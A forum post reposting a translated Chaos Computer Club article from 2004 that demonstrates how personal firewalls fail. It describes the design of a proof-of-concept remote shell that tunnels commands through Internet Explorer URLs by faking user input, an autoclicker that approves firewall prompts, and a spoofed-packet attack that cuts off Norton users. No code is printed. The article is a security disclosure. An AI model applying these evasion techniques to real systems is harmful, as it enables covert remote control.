"Personal Firewalls" A complete failure

[justme2]

I found this article, recently translated from a German site ...

Please comment on it. Appreciate it

The Chaos Computer Club Ulm and the Chaos Treff Bad Waldsee managed to prove some fundamental security problems of all existing "Personal Firwalls". The result was presented at the ChaosSeminar on November, the 12th, 2004 by Alexander Bernauer, Ansgar Wiechers and Jonathan Häberle.

A normal PC was equipped with all current security updates and configured as recommended by Microsoft. E.g. the user who was logged on did not have administrator privileges. Still, the "Personal Firewall" was not able to block the attacks. This was true for all tested products, such as Symantec Norton, Tiny, Kerio, Outpost and Zone Alarm.

Among other things Alexander Bernauer presented a remote shell (often erroneously called "Trojan"), with which a computer can be controlled remotely by a malicious attacker - in spite of an installed "Personal Firewall". This backdoor, called wwwsh (www-shell), operates according to a principle that Volker Birk presented in the usenet-group de.comp.security.misc (see www.dingens.org/breakout.c).

Basically the wwwsh fakes user activity so that it is able to do anything the user can do. This is achieved using the functionality of the Windows windowing system. As an example, the Internet Explorer is started and successive pages are loaded, whereby information encoded in the URL can be smuggled both out of and into the system.

Furthermore, a so called "auto-clicker" was presented which enables any program to be allowed to connect to the internet. This was true for all tested "Personal Firewalls"

We recommend to shut down all unused network services, as they are unknown and unwanted to most users anyway, instead of using a "Personal Firewall" to block access to them. If done, none of the tested "Personal Firewalls" offer any additional protection. How these services can be turned off is described by Torsten Mann at www.ntsvcfg.de. A simpler way is offered by "Shutdown Windows' Services" from the ChaosTreff Bad Waldsee, see www.dingens.org

Not only was demonstrated that "Personal Firewalls" offer no additional protection, but also that they can open up new security holes in a system. E.g. a PC running Symantec Norton can be disconnected from the Internet by a specific attack. A current example for such security problems through "Personal Firewalls" is a Bug in the LiveUpdate of several Symantec products as reported hereheise security (German). This bug can be used for an "Privilege Escalation", which enables an attacker to gain privileged rights.

Working with an active "Personal Firewall" is not safer but significantly more sluggish and CPU-intensive. An active Norton Personal Firewall 2005 consumed so many resources during the test that a 100 MB download took twice as long as when it was deactivated.

The demonstrated weaknesses of "Personal Firewalls" have been known among experts for a while. Here, the criticism towards vendors of "Personal Firewalls" and Microsoft was confirmed by programs which unequivocally prove that the promised security does not exist. Usage of a "Personal Firewall" is mostly senseless and often dangerous as compared to switching off unwanted services. Furthermore, the CCC Ulm demands that Microsoft shall finally implement a security system in their window management system and that they deliver their operating system with safe default settings. Especially important is, that only those services be activated which are truly needed. Windows Server 2003 has already shown that Microsoft could easily implement this.
wwwsh

wwwsh is a program that allows an attacker, in spite of an installed "Personal Firewall", to execute arbitrary commands with the rights of the user on a PC. The remote shell uses a browser as a host for communication with the internet. To launch and remotely steer the browser, user interaction is feigned via window messages. The communication's endpoint is a web server with a few CGI scripts.

First, wwwsh starts a browser. The Internet Explorer was chosen as a sample application because it is the standard browser on a Windows system. Since some "Personal Firewalls" prevent the creation of a processes via library functions, wwwsh simulates the following user input:
Pressing of the hotkey <Win>-<R> to open the "Run"-Dialog
Input of "%PROGRAMFILES%\Internet Explorer\IEXPLORE.EXE"
Pressing the <Return>-key

This approach was already presented by Volker Birk in the usenet group de.comp.security.misc.

By means of the Windows system libraries, wwwsh obtains a reference to the address bar of the Internet Explorer so that it can be manipulated by sending Windows messages. To browse to an URL, wwwsh writes this URL into the address bar using the windows message WM_SETTEXT and subsequently sends a WM_KEYDOWN with the parameter VK_RETURN which equals pressing the return key. The addressed web server always sends an HTML page with a meta-refresh which causes the browser to surf to a different URL. This URL appears in the address bar and can be retrieved from there via a WM_GETTEXT windows message. For both directions of communication base64-encoded information is contained in the URL. This encoding assures that no illegal characters appear in the URL.

wwwsh polls the web server to check whether there is a command to execute. To that end, the program makes the browser surf to the CGI script "/getCommand.cgi". In response, a meta-refresh to the URL "/Response" is received. If there is a command to execute, it will appear base64-encoded as a CGI parameter. The maximum allowed length of a URL thus limits the maximum allowed length of a command, but for most common commands this does not pose a problem. When browsing the response-URL the web server sends a page which serves the sole purpose of satisfying the browser and has no meaning beyond that.

The command received will be executed in a shell and the result will be base64 encoded. To transfer the answer, the CGI script "/sendResul.cgi" with the parameter "begin" is browsed. Then, any number of calls of the same script with the parameter "data" and subsequent base64 encoded data part follows. The length of the answer is thereby practically unlimited. Once transfer of the answer is complete, a last call of the script with the parameter "end" follows. Upon each request, the web server sends a meta refresh to the response URL. This serves to synchronize the two parties.

wwwsh is just a proof-of-concept. Therefore no attempt was made to hide the browser window. If required, this can be done in several ways: first, the window could be moved outside the visible range of the desktop. However, there would still be an entry in the task bar. Second, an application could be launched which runs in full screen mode, so that the complete desktop becomes invisible, and launch the browser afterwards. Third, the windows messages which result in displaying the browser window (WM_SHOWWINDOW) could be selectively intercepted. This is another feature of the Windows system libraries.

wwwsh.tar.bz2
Autoclicker

Autoclicker is a proof-of-concept which demonstrates that every program can send data to the internet in spite of a "Personal Firewall". Again user interaction is faked via the Windows Messaging System.

Current personal firewalls keep a list of programs, which are allowed to send data to the internet. If a non-registered program tries to send data to the internet the personal firewall will recognize this. The user is then asked whether the program may contact the internet. This is done via a menu window. This approach is a conceptual flaw as any program can fake any user-input. Autoclicker waits until the window appears and sends it appropriate Windows messages so that any program may send data to the internet.
Source code
Autoclicker for Kerio Personal Firewall
Autoclicker for Symantec Norton Personal Firewall
SelfDoS

The Norton Personal Firewall contains an Intrusion Detection System (IDS). It scans the network traffic for patterns of known attacks. If an attack is detected, any network traffic between the "protected" computer and the sender of the attack will be blocked for a certain amount of time. Even a single UDP packet can be interpreted as an attack. For example an inbound UDP packet at port 666 will be interpreted as an attempt to contact a Trojan horse. Thus by faking the sender ip, any participant of the internet can be blocked. If the DNS server is blocked in this way, the PC is practically disconnected from the internet.
Source code

For the demo we used the tool ipsorcery tool

[minoka]

Url for this German site, please ? I speak German. Thanks.